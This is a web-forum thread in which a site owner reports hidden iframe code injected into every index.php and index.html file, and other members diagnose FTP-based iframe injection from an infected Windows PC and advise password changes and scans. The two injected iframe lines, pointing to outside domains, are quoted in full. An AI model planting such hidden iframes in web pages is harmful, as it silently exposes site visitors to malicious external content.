Dolphin or Server Hacked ?...

is the script or the server hacked

never had this problem before

every single file ( index.php ord index.html ) has this following code added to it
<body><iframe src="http://betworldwager.cn/in.cgi?income68" width=1 height=1 style="visibility: hidden"></iframe>

and
<iframe src="http://internetcountercheck.com/?click=28759171" width=1 height=1 style="visibility:hidden;position:absolute"></iframe>

I believe it is html/framer. Looks like your server was hacked. Is this a windows server by any chance? And was it kept up to date with latest patches?

it's on  freeBSD
site is still running fine it's just that i have to open every singl index file and delete the line of code

Hi,

its not freeBSD problem. Check your ftp logs.

Probably you use Total Commander (with passwords stored in configuration) on PC running Microsoft OS. First of all CHANGE your password to all accounts with ftp privilidges. Later... scan your PC. If nothing found - do windows restore from restore point (with date which is earlier than index.php/html modification).

Uki

PS: sry for my english its not my native

uki is correct. This is a form of html iframe injection. This one most likely comes from infected windows computer and uses ftp to get to your site as uki mentiond.

Scan your computer, make sure it's up to date with all patches and up to date antivirus. And get a copy of malwarebytes anti malware from malwarebytes.org.

Do not roll back your computer unless you have no other choice. I have been in the business of repairing computers for 15 years and have found from experience that the windows restore feature should only be used if you have no other choice. It does work, but i have seen it make things worse far to many times for me to trust it.

One final note. Change all your passwords. Not just your ftp password. Change everything. FTP, MYSql, Cpanal, every password you use to access your server.